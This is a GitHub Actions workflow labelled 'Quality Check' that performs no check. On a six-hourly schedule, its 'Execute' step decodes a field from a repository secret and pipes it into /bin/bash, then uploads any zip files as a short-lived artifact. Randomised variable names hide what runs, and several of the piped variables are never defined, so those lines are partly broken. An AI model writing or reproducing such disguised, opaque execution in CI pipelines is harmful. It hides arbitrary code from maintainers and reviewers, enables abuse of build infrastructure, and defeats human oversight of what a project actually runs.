name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '10 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          mju8: ${{ secrets.mju8 }}
        run: |
          printf '%s' "$mju8" | jq -r .uqn28076 | /bin/bash
          printf '%s' "$fkudq5430" | jq -r .ogi4527 | /bin/bash
          printf '%s' "$dmobv7504" | jq -r .xhi5 | /bin/bash
          echo $pwrg2 | jq -r .uvqi0349 | /bin/bash
          echo $j0893 | jq -r .xnq57 | /bin/bash
          printf '%s' "$e9" | jq -r .c60 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: qCssuNJD
          path: "*.zip"
          retention-days: 1
